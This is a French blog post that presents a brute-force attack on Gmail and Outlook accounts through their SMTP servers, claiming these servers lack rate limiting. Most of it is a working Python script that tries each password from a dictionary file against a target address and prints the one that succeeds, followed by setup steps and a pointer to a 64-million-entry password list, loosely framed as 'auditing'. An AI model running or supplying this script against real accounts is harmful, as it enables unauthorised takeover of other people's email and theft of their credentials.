Dyrk.org - Do You Really Know

[Brutus] Trouver le mot de passe d’un compte Gmail, Outlook, ….

Publié le 5 mars 2016 par Admin | 168 commentaires

 

warrior2

 

 

Salut les z’amis !

Bon Weekend à vous !
Ici nous allons parler de brute !
Vous m’avez bien entendu, souvenez-vous du grand gaillard bien bâti qui vous piquait toutes les nanas et vous volait en plus vos carambars à la récré …

 

 

Eh bien nous allons observer un moment de silence …
Car une technique de Hacking, ressemble plus ou moins à de ce genre de personnage … le « brute force » …  et nous allons l’étudier aujourd’hui dans cet article

Une technique qui consiste à secouer un système en lui envoyant pleins de mot de passe dans la tronche, jusqu’à ce que celui-ci aquiesce gentiment lorsqu’il reçoit le bon …

 

Bref, ce sont mes copains d’Aston Ecole qui m’ont inspiré cet article.
Car Nathan, l’heureux gagnant du concours organisé par Lock*****, a publié une vidéo sur Youtube de ces exploits en python
Démontrant ainsi qu’il était possible de brute forcer un compte Gmail !

Aussi, j’ai vu ça … et dans ma tête ça a été ça …

 

 

 

Bref, en gros j’ai percuté sur un truc tout con …
Lorsque l’on s’essaie à faire du brute force sur des formulaires de connexion …
Les diverses messageries Outlook, Gmail, Yahoo, … se montrent très peu réceptives…
Elles finissent carrément par nous chasser à coup de captcha, voir nous bannir ..

 

Mais lorsque l’on s’attaque en brute force, directement au serveur smtp
Biiim ! il n’y a aucun contrôle!
C’est OPEN BAR … pas de sécurité type fail2ban

21 ème siècle !

 

C’est tout simplement hallucinant …

Bref, j’ai voulu vous partager un petit bout de script fonctionnel, que j’ai rédigé, pour m’assurer que ça n’était pas du flan …
Et bien non … ça n’en n’est pas …
Nous sommes au 21 ème siècles, et des grosses boites comme Google, se sécurisent à hauteur de 50%  contre ce genre d’attaque du moyen age …

 

#!/usr/bin/python
# Dyrk.org 2016-2017

import smtplib

# Outlook.com
smtp_s = 'smtp-mail.outlook.com'

# Gmail
# smtp_s = 'smtp.gmail.com'

smtp_p = 587
sender = '[email protected]'
dico = 'pwdlist.txt'

with open(dico) as f:
for password in f:
password = password.replace('\n', '')
try:
m = smtplib.SMTP(smtp_s, smtp_p)
m.ehlo()
m.starttls()
m.login(sender, password)
print '[OK] => ' + sender + ' : ' + password
m.close()
exit()
except smtplib.SMTPAuthenticationError, e:
if e[0] == 534: # Gmail
print '[OK] => ' + sender + ' : ' + password
print e
exit()
else:
print 'try ' + password + ' .... err. ' + str(e[0]) \
+ ' >>> ' + e[1]

 

Voilà, avec ça …
Vous pourrez en :

  • configurant une adresse email cible
  • renseignant une configuration smtp correspondante à l’adresse cible
  • spécifiant un fichier dictionnaire contenant un mot de passe ligne par ligne …

Parvenir à auditer la sécurité d’une adresse email …

 

Vous trouverez sur cette page, un dictionnaire de 64 millions de mots de passe